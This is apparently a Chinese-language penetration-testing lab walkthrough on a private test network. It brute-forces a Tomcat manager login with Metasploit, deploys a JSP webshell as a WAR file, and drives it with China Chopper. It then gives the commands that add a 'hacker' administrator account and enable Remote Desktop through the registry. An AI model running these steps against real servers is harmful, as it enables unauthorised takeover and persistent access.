第一步,打开网络拓扑,启动实验虚拟机,分别查看虚拟机IP地址:
Kali Linux
Windows 7
Windows 7-1:
第二步,在Windows 7-1靶机中运行Tomcat:
桌面-apache-tomcat-9.0.29-bin-双击startup.bat
第三步,切换至渗透机Kali Linux,使用浏览器访问靶机的Tomcat服务:
http://172.16.1.200:8080(靶机IP地址)
第四步,点击页面中的“Manager App”,被要求输入用户名和密码:
第五步,打开终端,运行msfconsole。使用Tomcat密码破解模块破解Tomcat的密码:
我们设置用户名为Tomcat默认的“tomcat”,使用密码字典“/root/dict.txt”。
运行命令后,得到Tomcat后台的管理员用户名:tomcat,密码:s3cret。
第六步,切换至Windows 7渗透机,访问靶机的Tomcat服务:
http://172.16.1.200:8080
第七步,点击“Manager App”按钮,输入用户名tomcat,密码s3cret,登录至管理页面
第八步,将桌面上的JSP一句话木马打包。右键torjan.jsp-添加到“torjan.zip”:
第九步,将torjan.zip重命名为torjan.war
第十步,回到Tomcat管理页面,在“要部署的WAR文件”处,上传刚刚压缩的torjan.war
第十一步,点击部署后,访问部署的jsp文件所在位置:
http://172.16.1.200:8080/torjan/torjan.jsp
第十二步,打开桌面上2011caidao文件夹,双击chopper.exe启动中国菜刀
第十三步,右键菜刀空白处-添加-设置地址为torjan.jsp的地址,密码为pass,点击添加:
第十四步,双击添加后的地址,访问靶机的文件管理器:
成功读取靶机中的文件。
第十五步,返回主页,右键地址-虚拟终端
第十六步,在终端中添加用户hacker,密码123456,并将用户设置为管理员:
net user hacker 123456 /add
net localgroup administrators hacker /add
第十七步,开启靶机远程桌面功能:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
第十八步,在Windows 7渗透机按Win+R键或点击开始菜单-运行,输入mstsc
第十九步,输入服务器IP地址后点击连接
第二十步,登录hacker/123456
第二十一步,进入远程桌面,打开cmd,输入net user hacker
至此提权成功。